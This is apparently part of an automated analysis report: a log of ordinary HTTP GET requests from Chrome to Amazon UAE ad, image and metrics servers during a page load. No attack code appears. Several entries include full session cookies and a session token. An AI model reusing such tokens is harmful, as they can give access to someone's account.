Source: global trafficHTTP traffic detected: GET /e/xsp/imp?b=RLIYXr6sK-Tdry028JK9OgsAAAGRRsH9MgMAAAIGAQBvbm9fdHhuX2JpZDMgICBvbm9fdHhuX2ltcDEgICCq3cNZ&pj=%7B%22measurementMethod%22%3A%22btr_client%22%7D HTTP/1.1Host: aax-eu.amazon.aeConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: session-id=262-5692979-3003613; session-id-time=2082787201l; i18n-prefs=AED; ubid-acbae=261-1616972-1526733; session-token=u+Xu9IKk6z4bWSqe4Kvvln6p1zDqk1D7MnNB3tWScH7touYZc6sh6dHBcy2q2HhlEEXu80ZhJqEZM7k3rjxpO8gESSmSk1s6P1T+jKUCHdwhi4PKpFieH254fkL8Sx471FVO3uSkKyv0kMJuqkkEOmdxCmYS4Uu3M8HhXVFO8mGXjhRenzR1BGRPXv/dL6i02Av5x5UVUBkWBOjQsEM+LkEcipsOGdGjSyPfkOMzshISd9tYctqiC8wDGa2yLTvP1TSnUUd/BS2GJinV6ANw8B2KEiOU5rLMfVcFqNzDeQRe2A2vpRjUXoNG1EDbU2Uck7JLHPddRS6bAJSNyn0Zq9+V3fb/khVK
Source: global trafficHTTP traffic detected: GET /x/px/RLIYXr6sK-Tdry028JK9OgsAAAGRRsH9MgMAAAIGAQBvbm9fdHhuX2JpZDMgICBvbm9fdHhuX2ltcDEgICCq3cNZ/atf/%7B%22atf%22:false%7D HTTP/1.1Host: aax-eu.amazon.aeConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: session-id=262-5692979-3003613; session-id-time=2082787201l; i18n-prefs=AED; ubid-acbae=261-1616972-1526733; session-token=u+Xu9IKk6z4bWSqe4Kvvln6p1zDqk1D7MnNB3tWScH7touYZc6sh6dHBcy2q2HhlEEXu80ZhJqEZM7k3rjxpO8gESSmSk1s6P1T+jKUCHdwhi4PKpFieH254fkL8Sx471FVO3uSkKyv0kMJuqkkEOmdxCmYS4Uu3M8HhXVFO8mGXjhRenzR1BGRPXv/dL6i02Av5x5UVUBkWBOjQsEM+LkEcipsOGdGjSyPfkOMzshISd9tYctqiC8wDGa2yLTvP1TSnUUd/BS2GJinV6ANw8B2KEiOU5rLMfVcFqNzDeQRe2A2vpRjUXoNG1EDbU2Uck7JLHPddRS6bAJSNyn0Zq9+V3fb/khVK
Source: global trafficHTTP traffic detected: GET /images/I/61HvUP231DL._AC_SY200_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/I/71E+thfSZHL._AC_SY200_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/I/716nKw-6UxL._AC_SY200_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/I/61SpqN46FvL._AC_SY200_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/I/914aX7nCqFL._AC_SY200_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/I/61Maf8rwu-L._AC_SY200_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/I/61HvUP231DL._AC_SY200_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/I/716nKw-6UxL._AC_SY200_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/I/71E+thfSZHL._AC_SY200_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/I/71YJXiyG3LL._AC_SY200_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/I/71ujoDGMTQL._AC_SY200_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/I/81NQOGJKvkL._AC_SY200_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/I/81YNNeFhXKL._AC_SY200_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/I/718G151Go9L._AC_SY200_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/I/71BqLrWjHEL._AC_SY200_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/I/71ujoDGMTQL._AC_SY200_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/I/81NQOGJKvkL._AC_SY200_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/I/71YJXiyG3LL._AC_SY200_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/I/81YNNeFhXKL._AC_SY200_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/I/718G151Go9L._AC_SY200_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/I/71BqLrWjHEL._AC_SY200_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/I/61v-DUo-vZL._AC_SY200_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/I/61YiGh5SWaL._AC_SY200_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/I/61xur6u9CKL._AC_SY200_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/I/617y0uaih6L._AC_SY200_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/I/81T0Bvf7SSL._AC_SY200_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/I/81Kd47aq+QL._AC_SY200_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/I/61YiGh5SWaL._AC_SY200_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/I/617y0uaih6L._AC_SY200_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/I/61xur6u9CKL._AC_SY200_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/I/61v-DUo-vZL._AC_SY200_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/I/61JiO74FgDL._AC_SY200_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/I/61tt9VVcfFL._AC_SY200_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/I/81T0Bvf7SSL._AC_SY200_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/I/71tGQq+WtwL._AC_SY200_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/I/81Kd47aq+QL._AC_SY200_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /1/events/com.amazon.eel.SearchAutocompleteUIServiceMetrics.nexus HTTP/1.1Host: unagi.amazon.aeConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: session-id=262-5692979-3003613; session-id-time=2082787201l; i18n-prefs=AED; ubid-acbae=261-1616972-1526733; session-token=u+Xu9IKk6z4bWSqe4Kvvln6p1zDqk1D7MnNB3tWScH7touYZc6sh6dHBcy2q2HhlEEXu80ZhJqEZM7k3rjxpO8gESSmSk1s6P1T+jKUCHdwhi4PKpFieH254fkL8Sx471FVO3uSkKyv0kMJuqkkEOmdxCmYS4Uu3M8HhXVFO8mGXjhRenzR1BGRPXv/dL6i02Av5x5UVUBkWBOjQsEM+LkEcipsOGdGjSyPfkOMzshISd9tYctqiC8wDGa2yLTvP1TSnUUd/BS2GJinV6ANw8B2KEiOU5rLMfVcFqNzDeQRe2A2vpRjUXoNG1EDbU2Uck7JLHPddRS6bAJSNyn0Zq9+V3fb/khVK
Source: global trafficHTTP traffic detected: GET /images/I/81SRiWX-rcL._AC_SY200_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/I/51ytwQsTQJL._AC_SY200_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/I/51APRC2x3IL._AC_SY200_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/I/61JiO74FgDL._AC_SY200_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/I/61tt9VVcfFL._AC_SY200_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/I/71tGQq+WtwL._AC_SY200_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
